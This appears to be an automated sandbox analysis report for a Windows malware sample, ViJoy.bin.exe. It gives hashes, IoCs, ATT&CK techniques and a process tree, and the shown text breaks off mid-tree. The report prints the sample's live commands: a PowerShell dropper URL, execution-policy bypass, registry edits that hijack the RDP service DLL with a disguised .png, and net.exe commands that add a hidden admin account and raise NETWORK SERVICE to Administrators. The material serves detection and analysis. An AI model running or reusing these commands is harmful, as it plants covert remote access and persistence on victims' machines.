555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08

Analysis

max time kernel
128s
max time network
113s
platform
windows10_x64
resource
win10v20210410
submitted
21-07-2021 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ViJoy.bin.exe
Size

6.0MB
MD5

03051f3c44a2c8d196c95ea458b0aff4
SHA1

d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256

555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512

883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46

Score

10^/10

bootkit persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
19	4880	powershell.exe
21	4880	powershell.exe
22	4880	powershell.exe
23	4880	powershell.exe
25	4880	powershell.exe
27	4880	powershell.exe
29	4880	powershell.exe
31	4880	powershell.exe
33	4880	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

exe1.exeexe2.exeNFWCHK.exe

pid process

2412 exe1.exe
2396 exe2.exe
3500 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2412	exe1.exe
2396	exe2.exe
3500	NFWCHK.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

4136
4136
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

exe2.exe

description ioc process

File opened for modification \??\PhysicalDrive0 exe2.exe

pid	process
4136
4136

description	ioc	process
File opened for modification	\??\PhysicalDrive0	exe2.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DA7.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DC8.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wq0c2djq.mgk.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DD9.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5D87.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DB8.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zuegjl3.xmj.ps1	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4844 reg.exe
Runs net.exe

pid	process
4844	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3292	powershell.exe
3292	powershell.exe
3292	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4404	powershell.exe
4404	powershell.exe
4404	powershell.exe
3292	powershell.exe
3292	powershell.exe
3292	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

624
624

pid	process
624
624

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeIncreaseQuotaPrivilege	4028	powershell.exe
Token: SeSecurityPrivilege	4028	powershell.exe
Token: SeTakeOwnershipPrivilege	4028	powershell.exe
Token: SeLoadDriverPrivilege	4028	powershell.exe
Token: SeSystemProfilePrivilege	4028	powershell.exe
Token: SeSystemtimePrivilege	4028	powershell.exe
Token: SeProfSingleProcessPrivilege	4028	powershell.exe
Token: SeIncBasePriorityPrivilege	4028	powershell.exe
Token: SeCreatePagefilePrivilege	4028	powershell.exe
Token: SeBackupPrivilege	4028	powershell.exe
Token: SeRestorePrivilege	4028	powershell.exe
Token: SeShutdownPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeSystemEnvironmentPrivilege	4028	powershell.exe
Token: SeRemoteShutdownPrivilege	4028	powershell.exe
Token: SeUndockPrivilege	4028	powershell.exe
Token: SeManageVolumePrivilege	4028	powershell.exe
Token: 33	4028	powershell.exe
Token: 34	4028	powershell.exe
Token: 35	4028	powershell.exe
Token: 36	4028	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4144	powershell.exe
Token: SeSecurityPrivilege	4144	powershell.exe
Token: SeTakeOwnershipPrivilege	4144	powershell.exe
Token: SeLoadDriverPrivilege	4144	powershell.exe
Token: SeSystemProfilePrivilege	4144	powershell.exe
Token: SeSystemtimePrivilege	4144	powershell.exe
Token: SeProfSingleProcessPrivilege	4144	powershell.exe
Token: SeIncBasePriorityPrivilege	4144	powershell.exe
Token: SeCreatePagefilePrivilege	4144	powershell.exe
Token: SeBackupPrivilege	4144	powershell.exe
Token: SeRestorePrivilege	4144	powershell.exe
Token: SeShutdownPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeSystemEnvironmentPrivilege	4144	powershell.exe
Token: SeRemoteShutdownPrivilege	4144	powershell.exe
Token: SeUndockPrivilege	4144	powershell.exe
Token: SeManageVolumePrivilege	4144	powershell.exe
Token: 33	4144	powershell.exe
Token: 34	4144	powershell.exe
Token: 35	4144	powershell.exe
Token: 36	4144	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeIncreaseQuotaPrivilege	4404	powershell.exe
Token: SeSecurityPrivilege	4404	powershell.exe
Token: SeTakeOwnershipPrivilege	4404	powershell.exe
Token: SeLoadDriverPrivilege	4404	powershell.exe
Token: SeSystemProfilePrivilege	4404	powershell.exe
Token: SeSystemtimePrivilege	4404	powershell.exe
Token: SeProfSingleProcessPrivilege	4404	powershell.exe
Token: SeIncBasePriorityPrivilege	4404	powershell.exe
Token: SeCreatePagefilePrivilege	4404	powershell.exe
Token: SeBackupPrivilege	4404	powershell.exe
Token: SeRestorePrivilege	4404	powershell.exe
Token: SeShutdownPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeSystemEnvironmentPrivilege	4404	powershell.exe
Token: SeRemoteShutdownPrivilege	4404	powershell.exe
Token: SeUndockPrivilege	4404	powershell.exe
Token: SeManageVolumePrivilege	4404	powershell.exe
Token: 33	4404	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

exe2.exe

pid process

2396 exe2.exe
2396 exe2.exe

pid	process
2396	exe2.exe
2396	exe2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ViJoy.bin.exeexe2.exeexe1.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 3904 wrote to memory of 2412	3904	ViJoy.bin.exe	exe1.exe
PID 3904 wrote to memory of 2412	3904	ViJoy.bin.exe	exe1.exe
PID 3904 wrote to memory of 2396	3904	ViJoy.bin.exe	exe2.exe
PID 3904 wrote to memory of 2396	3904	ViJoy.bin.exe	exe2.exe
PID 3904 wrote to memory of 2396	3904	ViJoy.bin.exe	exe2.exe
PID 2396 wrote to memory of 3500	2396	exe2.exe	NFWCHK.exe
PID 2396 wrote to memory of 3500	2396	exe2.exe	NFWCHK.exe
PID 2412 wrote to memory of 3292	2412	exe1.exe	powershell.exe
PID 2412 wrote to memory of 3292	2412	exe1.exe	powershell.exe
PID 3292 wrote to memory of 2460	3292	powershell.exe	csc.exe
PID 3292 wrote to memory of 2460	3292	powershell.exe	csc.exe
PID 2460 wrote to memory of 3972	2460	csc.exe	cvtres.exe
PID 2460 wrote to memory of 3972	2460	csc.exe	cvtres.exe
PID 3292 wrote to memory of 4028	3292	powershell.exe	powershell.exe
PID 3292 wrote to memory of 4028	3292	powershell.exe	powershell.exe
PID 3292 wrote to memory of 4144	3292	powershell.exe	powershell.exe
PID 3292 wrote to memory of 4144	3292	powershell.exe	powershell.exe
PID 3292 wrote to memory of 4404	3292	powershell.exe	powershell.exe
PID 3292 wrote to memory of 4404	3292	powershell.exe	powershell.exe
PID 3292 wrote to memory of 4824	3292	powershell.exe	reg.exe
PID 3292 wrote to memory of 4824	3292	powershell.exe	reg.exe
PID 3292 wrote to memory of 4844	3292	powershell.exe	reg.exe
PID 3292 wrote to memory of 4844	3292	powershell.exe	reg.exe
PID 3292 wrote to memory of 4864	3292	powershell.exe	reg.exe
PID 3292 wrote to memory of 4864	3292	powershell.exe	reg.exe
PID 3292 wrote to memory of 5044	3292	powershell.exe	net.exe
PID 3292 wrote to memory of 5044	3292	powershell.exe	net.exe
PID 5044 wrote to memory of 5064	5044	net.exe	net1.exe
PID 5044 wrote to memory of 5064	5044	net.exe	net1.exe
PID 3292 wrote to memory of 5096	3292	powershell.exe	cmd.exe
PID 3292 wrote to memory of 5096	3292	powershell.exe	cmd.exe
PID 5096 wrote to memory of 5112	5096	cmd.exe	cmd.exe
PID 5096 wrote to memory of 5112	5096	cmd.exe	cmd.exe
PID 5112 wrote to memory of 3960	5112	cmd.exe	net.exe
PID 5112 wrote to memory of 3960	5112	cmd.exe	net.exe
PID 3960 wrote to memory of 2684	3960	net.exe	net1.exe
PID 3960 wrote to memory of 2684	3960	net.exe	net1.exe
PID 3292 wrote to memory of 3700	3292	powershell.exe	cmd.exe
PID 3292 wrote to memory of 3700	3292	powershell.exe	cmd.exe
PID 3700 wrote to memory of 3612	3700	cmd.exe	cmd.exe
PID 3700 wrote to memory of 3612	3700	cmd.exe	cmd.exe
PID 3612 wrote to memory of 4112	3612	cmd.exe	net.exe
PID 3612 wrote to memory of 4112	3612	cmd.exe	net.exe
PID 4112 wrote to memory of 4124	4112	net.exe	net1.exe
PID 4112 wrote to memory of 4124	4112	net.exe	net1.exe
PID 4248 wrote to memory of 4308	4248	cmd.exe	net.exe
PID 4248 wrote to memory of 4308	4248	cmd.exe	net.exe
PID 4308 wrote to memory of 4328	4308	net.exe	net1.exe
PID 4308 wrote to memory of 4328	4308	net.exe	net1.exe
PID 4348 wrote to memory of 4216	4348	cmd.exe	net.exe
PID 4348 wrote to memory of 4216	4348	cmd.exe	net.exe
PID 4216 wrote to memory of 4148	4216	net.exe	net1.exe
PID 4216 wrote to memory of 4148	4216	net.exe	net1.exe
PID 4256 wrote to memory of 4000	4256	cmd.exe	net.exe
PID 4256 wrote to memory of 4000	4256	cmd.exe	net.exe
PID 4000 wrote to memory of 4428	4000	net.exe	net1.exe
PID 4000 wrote to memory of 4428	4000	net.exe	net1.exe
PID 4412 wrote to memory of 4532	4412	cmd.exe	net.exe
PID 4412 wrote to memory of 4532	4412	cmd.exe	net.exe
PID 4532 wrote to memory of 4552	4532	net.exe	net1.exe
PID 4532 wrote to memory of 4552	4532	net.exe	net1.exe
PID 4580 wrote to memory of 4620	4580	cmd.exe	net.exe
PID 4580 wrote to memory of 4620	4580	cmd.exe	net.exe
PID 4620 wrote to memory of 4644	4620	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3904

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396

C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
3⤵
- Executes dropped EXE
PID:3500

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3292

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2541.tmp" "c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP"
5⤵
PID:3972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4404

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
4⤵
PID:4824

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
4⤵
- Modifies registry key
PID:4844

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
4⤵
PID:4864

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
- Suspicious use of WriteProcessMemory
PID:5044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
5⤵
PID:5064

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:5096

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\system32\net.exe
net start rdpdr
6⤵
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
7⤵
PID:2684

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\system32\cmd.exe
cmd /c net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\system32\net.exe
net start TermService
6⤵
- Suspicious use of WriteProcessMemory
PID:4112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
7⤵
PID:4124

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
4⤵
PID:4164

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
4⤵
PID:4000

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:4328

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc WVXHFeyt /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc WVXHFeyt /add
2⤵
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\system32\net1.exe
